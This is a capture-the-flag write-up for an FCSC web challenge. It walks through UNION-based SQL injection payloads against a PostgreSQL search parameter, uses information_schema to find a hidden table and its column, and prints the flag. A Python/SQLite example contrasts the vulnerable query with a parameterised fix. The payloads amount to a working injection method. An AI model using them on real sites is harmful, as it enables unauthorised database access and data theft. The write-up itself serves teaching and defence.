We know from Chatpristi 1/1 that the website is vulnerable to an SQL injection through GET requests to the index with the search keyword. Let’s dig further to learn about the database structure. For this, we will use the PostgreSQL information schema.
Database introspection
From the PostgreSQL documentation, we know that database information is stored in views of a schema called information_schema.
Finding the table names
We will use a SQL UNION with the view information_schema.tables. Here is how we get to the correct payload:
') UNION SELECT 'a' FROM information_schema.tables-- gives us “each UNION query must have the same number of columns”.
') UNION SELECT 'a', 'b' FROM information_schema.tables-- gives us the same message. Let’s keep adding columns until we match the number of columns in the first SELECT statement of the query.
') UNION SELECT 'a', 'b', 'c' FROM information_schema.tables-- gives us “invalid input syntax for type integer: “a””. This means that there are three columns, but the first one is an integer.
') UNION SELECT 1, 'b', 'c' FROM information_schema.tables-- doesn’t give an error message anymore, and a box with “c” written in it appears on screen. So the last column of the query corresponds to the labels that accompany the images.
') UNION SELECT 1, 'b', table_name FROM information_schema.tables-- displays all the table names. One is particularly intriguing: ___youw1lln3verfindmyfl4g___.
Finding the column names
Let’s continue with the same method to learn about the columns that this table contains. We use the following payload:
') UNION SELECT 1, 'b', column_name FROM information_schema.columns WHERE table_name='___youw1lln3verfindmyfl4g___'--
We learn that the column names are: id and fstbg0adwb8f5upmg. Let’s check what’s inside!
The flag
At last, this payload yields the flag:
') UNION SELECT 1, 'b', fstbg0adwb8f5upmg FROM ___youw1lln3verfindmyfl4g___--
FCSC{edfaeb139255929e55a3cffe9f3f37cd4e871e5015c4d4ade2b02d77d44019e5}
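Why payloads of this form work, and the fix, as an added example that is not part of the original write-up or the challenge's code. The back-end query is not shown on this page, so the query shape, the memes and hidden tables and their contents are constructed assumptions, and SQLite stands in for PostgreSQL.

```python
import sqlite3

# Same form as the write-up's final payload, aimed at the constructed table below.
PAYLOAD = "') UNION SELECT 1, 'b', secret FROM hidden--"

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE memes (id INTEGER PRIMARY KEY, url TEXT, label TEXT);
        INSERT INTO memes (url, label) VALUES
            ('/img/1.png', 'grumpy cat'),
            ('/img/2.png', '100% doge');
        CREATE TABLE hidden (id INTEGER PRIMARY KEY, secret TEXT);
        INSERT INTO hidden (secret) VALUES ('constructed-secret');
    """)
    return db

def search_vulnerable(db, keyword):
    # The keyword is pasted into the SQL text, so a quote and a parenthesis
    # in it end the LIKE pattern and the rest is parsed as SQL.
    sql = f"SELECT id, url, label FROM memes WHERE (label LIKE '%{keyword}%')"
    return db.execute(sql).fetchall()

def escape_like(keyword):
    # Binding stops injection, but % and _ are still LIKE wildcards: escape them.
    return (keyword.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))

def search_safe(db, keyword):
    # The keyword travels as a bound parameter and is only ever data.
    sql = ("SELECT id, url, label FROM memes "
           "WHERE (label LIKE '%' || ? || '%' ESCAPE '\\')")
    return db.execute(sql, (escape_like(keyword),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))
    print("safe:      ", search_safe(db, PAYLOAD))
```

With the bound parameter, the same input is searched for as a literal label and matches nothing. On PostgreSQL, the information_schema views only list objects the connecting role has privileges on, so a web role restricted to the tables it needs also narrows what such introspection can reveal.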